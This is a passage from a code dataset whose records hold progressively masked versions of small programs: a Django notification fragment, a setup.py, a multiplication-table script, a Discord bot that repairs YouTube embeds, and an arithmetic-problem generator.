content {self.content}'\n return f'{str(self.sent_to)} content {self.content}'\n\n class Meta:\n ordering = ('is_read', '-created_at')\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(\n receiver_device.registration_id,\n title=instance.title,\n body=instance.content\n )\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([\n UserNotification(**{\n 'title': instance.title,\n 'sent_to': user,\n 'notification_type': INFO,\n 'content': instance.description\n }) for user in User.objects.all()\n ])\n\n\npost_save.connect(send_push_notification, sender=UserNotification)\npost_save.connect(send_article_notifications, sender=Article)\n",
"step-ids": [
9,
10,
11,
12,
15
]
}
|
[
9,
10,
11,
12,
15
] |
# coding: gb18030
from setuptools import setup
setup(
name="qlquery",
version="1.0",
license="MIT",
packages=['qlquery'],
install_requires=[
'my-fake-useragent',
'requests',
'beautifulsoup4'
],
zip_safe=False
)
|
normal
|
{
"blob_id": "f11ede752df7d9aff672eee4e230b109fcbf987b",
"index": 8555,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='qlquery', version='1.0', license='MIT', packages=['qlquery'],\n install_requires=['my-fake-useragent', 'requests', 'beautifulsoup4'],\n zip_safe=False)\n",
"step-3": "from setuptools import setup\nsetup(name='qlquery', version='1.0', license='MIT', packages=['qlquery'],\n install_requires=['my-fake-useragent', 'requests', 'beautifulsoup4'],\n zip_safe=False)\n",
"step-4": "# coding: gb18030\n\nfrom setuptools import setup\n\nsetup(\n name=\"qlquery\",\n version=\"1.0\",\n license=\"MIT\",\n packages=['qlquery'],\n install_requires=[\n 'my-fake-useragent',\n 'requests',\n 'beautifulsoup4'\n ],\n zip_safe=False\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Autor : Kevin Oswaldo Palacios Jimenez
# Fecha de creacion: 16/09/19
# Se genera un bucle con for
# al no tener argumento print no genera ningun cambio
# mas que continuar a la siguiente linea
for i in range (1,11):
encabezado="Tabla del {}"
print(encabezado.format(i))
print()
# Usaremos un for dentro de otro generando un bucle mas
for j in range(1,11):
# en donde i tendremos la base
# con j tendriamos el elemento
salida="{} x {} = {}"
print(salida.format(i,j,i*j))
else:
# con el bucle teniendo su proceso iterativo
# se saltaran las linea pero ejecutando el codigo
print()
|
normal
|
{
"blob_id": "86f365612e9f15e7658160ecab1d3d9970ca364e",
"index": 9699,
"step-1": "<mask token>\n",
"step-2": "for i in range(1, 11):\n encabezado = 'Tabla del {}'\n print(encabezado.format(i))\n print()\n for j in range(1, 11):\n salida = '{} x {} = {}'\n print(salida.format(i, j, i * j))\n else:\n print()\n",
"step-3": "# Autor : Kevin Oswaldo Palacios Jimenez\r\n# Fecha de creacion: 16/09/19 \r\n\r\n# Se genera un bucle con for \r\n# al no tener argumento print no genera ningun cambio \r\n# mas que continuar a la siguiente linea\r\nfor i in range (1,11): \r\n encabezado=\"Tabla del {}\" \r\n print(encabezado.format(i))\r\n\r\n print() \r\n # Usaremos un for dentro de otro generando un bucle mas\r\n for j in range(1,11): \r\n # en donde i tendremos la base \r\n # con j tendriamos el elemento\r\n salida=\"{} x {} = {}\" \r\n print(salida.format(i,j,i*j)) \r\n else: \r\n # con el bucle teniendo su proceso iterativo \r\n # se saltaran las linea pero ejecutando el codigo \r\n print() ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
"""
import json
import logging
import re
import asyncio
from typing import Optional
import discord
from discord.ext import commands
import utils
logging.basicConfig(level=logging.INFO, format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s")
log = logging.getLogger("YTEmbedFixer")
client = commands.Bot(command_prefix="yt!",
max_messages=5000,
description="A bot for fixing what Discord can't.\n",
owner_id=389590659335716867,
case_insensitive=True)
@client.event
async def on_ready():
log.info('Connected using discord.py {}!'.format(discord.__version__))
log.info('Username: {0.name}, ID: {0.id}'.format(client.user))
log.info("Connected to {} servers.".format(len(client.guilds)))
activity = discord.Game("Fixing what Discord can't since 12/5/2019.".format(client.command_prefix))
await client.change_presence(status=discord.Status.online, activity=activity)
log.info('------')
async def fix_yt_embed(message: discord.Message) -> Optional[discord.Embed]:
regex_search_string = r'(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)'
if len(message.embeds) == 1:
matches = re.findall(regex_search_string, message.content)
if len(matches) > 0:
# We have a valid youtube link with Embed! Check if it broken.
# We are lazy and trying to get this done quickly, so for the time being ignore all other embeds other than the first one.
if message.embeds[0].type == "link": # description == 'Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.':
# We have a broken embed!
await asyncio.sleep(2) # Sleep for a bit to let PK delete the message if it a proxy message
msg_check = discord.utils.get(client.cached_messages, id=message.id) # Check if message was deleted by PK.
if msg_check is not None:
html = await utils.get_video_webpage(matches[0])
video_url = "https://www.youtube.com/watch?v={}".format(matches[0])
video_image = await utils.get_video_image_url(html)
video_title = await utils.get_video_title(html)
author_name = await utils.get_author_name(html)
author_url = await utils.get_author_url(html)
if video_title is None and video_image is None and author_name is None and author_url is None:
#We got no info from the video. Prehaps the video is dead on youtube or the DOM has totally changed.
return None # Don't post empty embed.
embed = build_embed(video_url, video_image, video_title, author_name, author_url)
await send_new_embed(message, embed)
return None
async def send_new_embed(original_msg: discord.Message, embed: discord.Embed):
webhook: discord.Webhook = await utils.get_webhook(client, original_msg.channel)
try:
if original_msg.guild.me.permissions_in(original_msg.channel).manage_messages:
await original_msg.delete()
await webhook.send(content=original_msg.content, embed=embed, username=original_msg.author.display_name,
avatar_url=original_msg.author.avatar_url)
else:
await webhook.send(embed=embed, username=client.user.display_name,
avatar_url=client.user.avatar_url)
except discord.errors.NotFound:
pass # SHOULD never get here because we check before deleting, but just in case... Don't post replacement.
def build_embed(_video_url: str, _video_image_url: Optional[str], _video_title: Optional[str],
_author_name: Optional[str], _author_url: Optional[str]) -> discord.Embed:
embed = discord.Embed(type="video", colour=discord.Colour.from_rgb(255, 0, 0))
if _video_image_url is not None:
embed.set_image(url=_video_image_url)
if _author_name is not None:
if _author_url is not None:
embed.set_author(name=_author_name, url=_author_url)
else:
embed.set_author(name=_author_name)
if _video_title is not None:
embed.title = _video_title
embed.url = _video_url
return embed
# ---- Command Error Handling ----- #
@client.event
async def on_command_error(ctx, error):
if type(error) == discord.ext.commands.NoPrivateMessage:
await ctx.send("⚠ This command can not be used in DMs!!!")
return
elif type(error) == discord.ext.commands.CommandNotFound:
await ctx.send("⚠ Invalid Command!!!")
return
elif type(error) == discord.ext.commands.MissingPermissions:
await ctx.send("⚠ You need the **Manage Messages** permission to use this command".format(error.missing_perms))
return
elif type(error) == discord.ext.commands.MissingRequiredArgument:
await ctx.send("⚠ {}".format(error))
elif type(error) == discord.ext.commands.BadArgument:
await ctx.send("⚠ {}".format(error))
else:
await ctx.send("⚠ {}".format(error))
raise error
@client.event
async def on_message(message: discord.Message):
await fix_yt_embed(message)
await client.process_commands(message)
@client.event
async def on_message_edit(before: discord.Message, after: discord.Message):
await fix_yt_embed(after)
@client.command(name="invite", brief="Sends the invite link")
async def send_invite_link(ctx: commands.Context):
# link = "https://discordapp.com/oauth2/authorize?client_id=500711320497160199&scope=bot&permissions=536882176"
link = "https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176".format(client.user.id)
await ctx.send(link)
if __name__ == '__main__':
with open('config.json') as json_data_file:
config = json.load(json_data_file)
client.command_prefix = config['bot_prefix']
client.run(config['token'])
log.info("cleaning Up and shutting down")
|
normal
|
{
"blob_id": "d73832d3f0adf22085a207ab223854e11fffa2e8",
"index": 6948,
"step-1": "<mask token>\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\n<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\n<mask token>\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nlog = logging.getLogger('YTEmbedFixer')\nclient = commands.Bot(command_prefix='yt!', max_messages=5000, description=\n \"\"\"A bot for fixing what Discord can't.\n\"\"\", owner_id=\n 389590659335716867, case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-4": "<mask token>\nimport json\nimport logging\nimport re\nimport asyncio\nfrom typing import Optional\nimport discord\nfrom discord.ext import commands\nimport utils\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nlog = logging.getLogger('YTEmbedFixer')\nclient = commands.Bot(command_prefix='yt!', max_messages=5000, description=\n \"\"\"A bot for fixing what Discord can't.\n\"\"\", owner_id=\n 389590659335716867, case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-5": "\"\"\"\n\n\"\"\"\n\nimport json\nimport logging\nimport re\nimport asyncio\nfrom typing import Optional\n\nimport discord\nfrom discord.ext import commands\nimport utils\n\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s\")\nlog = logging.getLogger(\"YTEmbedFixer\")\n\n\nclient = commands.Bot(command_prefix=\"yt!\",\n max_messages=5000,\n description=\"A bot for fixing what Discord can't.\\n\",\n owner_id=389590659335716867,\n case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info(\"Connected to {} servers.\".format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=activity)\n\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) -> Optional[discord.Embed]:\n regex_search_string = r'(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)'\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n # We have a valid youtube link with Embed! Check if it broken.\n # We are lazy and trying to get this done quickly, so for the time being ignore all other embeds other than the first one.\n if message.embeds[0].type == \"link\": # description == 'Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.':\n # We have a broken embed!\n\n await asyncio.sleep(2) # Sleep for a bit to let PK delete the message if it a proxy message\n\n msg_check = discord.utils.get(client.cached_messages, id=message.id) # Check if message was deleted by PK.\n if msg_check is not None:\n\n html = await utils.get_video_webpage(matches[0])\n\n video_url = \"https://www.youtube.com/watch?v={}\".format(matches[0])\n\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n\n if video_title is None and video_image is None and author_name is None and author_url is None:\n #We got no info from the video. Prehaps the video is dead on youtube or the DOM has totally changed.\n return None # Don't post empty embed.\n embed = build_embed(video_url, video_image, video_title, author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg.channel)\n\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed, username=original_msg.author.display_name,\n avatar_url=original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.display_name,\n avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass # SHOULD never get here because we check before deleting, but just in case... Don't post replacement.\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str], _video_title: Optional[str],\n _author_name: Optional[str], _author_url: Optional[str]) -> discord.Embed:\n embed = discord.Embed(type=\"video\", colour=discord.Colour.from_rgb(255, 0, 0))\n\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\n# ---- Command Error Handling ----- #\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send(\"⚠ This command can not be used in DMs!!!\")\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send(\"⚠ Invalid Command!!!\")\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\"⚠ You need the **Manage Messages** permission to use this command\".format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send(\"⚠ {}\".format(error))\n else:\n await ctx.send(\"⚠ {}\".format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name=\"invite\", brief=\"Sends the invite link\")\nasync def send_invite_link(ctx: commands.Context):\n # link = \"https://discordapp.com/oauth2/authorize?client_id=500711320497160199&scope=bot&permissions=536882176\"\n link = \"https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176\".format(client.user.id)\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n\n log.info(\"cleaning Up and shutting down\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from random import randint, shuffle
class Generator:
opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']
@staticmethod
def generate(level):
"""
根据 level 生成指定等级的算术题
0:小学;1:初中;2:高中
"""
"""
生成操作数序列以及二元运算符序列
"""
length = randint(0 if level else 1, 4)
op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]
numArr = [randint(1, 100) for i in range(length + 1)]
"""
生成二元运算符的位置
"""
remain = 1
position = []
for i in range(length):
position.append(randint(0, remain))
remain += 1 - position[i]
if remain > 1:
position[-1] += remain - 1
"""
生成一元运算符序列
"""
op1Arr = []
if level:
if level == 1:
op1Arr.append(Generator.opset[randint(4, 5)])
elif level == 2:
op1Arr.append(Generator.opset[randint(6, 8)])
for i in range(randint(0, level)):
op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else
8)])
shuffle(op1Arr)
"""
生成后缀表达式
"""
expression = numArr
offset = 2
index = 0
for i in range(length):
for j in range(position[i]):
expression.insert(i + j + offset, op2Arr[index])
index += 1
offset += position[i]
for op in op1Arr:
expression.insert(randint(1, len(expression)), op)
def getPriority(item):
"""
返回运算符或操作数的优先级
操作数:0
一元运算符:1
'*'、'/':2
'+'、'-':3
"""
if isinstance(item, int):
return 0
elif item == '+' or item == '-':
return 3
elif item == '*' or item == '/':
return 2
else:
return 1
"""
转换成中缀表达式
stack 存储 (expression, priority)
"""
stack = []
for e in expression:
priority = getPriority(e)
if priority == 0:
"""
是一个操作数,直接入栈
"""
stack.append((e, 0))
elif priority == 3:
"""
是加/减运算,优先级最低,拼接后直接入栈
"""
item2 = stack.pop()[0]
item1 = stack.pop()[0]
stack.append(('%s%s%s' % (item1, e, item2), 3))
elif priority == 2:
"""
是乘/除运算,如果有加/减运算需要加括号
"""
item2, prio2 = stack.pop()
if prio2 > 2:
item2 = '(%s)' % item2
item1, prio1 = stack.pop()
if prio1 > 2:
item1 = '(%s)' % item1
stack.append(('%s%s%s' % (item1, e, item2), 2))
elif priority == 1:
"""
是一元运算,除了操作数都要加括号
"""
item, prio = stack.pop()
if prio:
item = '(%s)' % item
if e == '²':
stack.append(('%s%s' % (item, '²'), 1))
else:
stack.append(('%s%s' % (e, item), 1))
return stack[0][0]
|
normal
|
{
"blob_id": "6e3bb17696953256af6d8194128427acebf1daac",
"index": 524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Generator:\n <mask token>\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
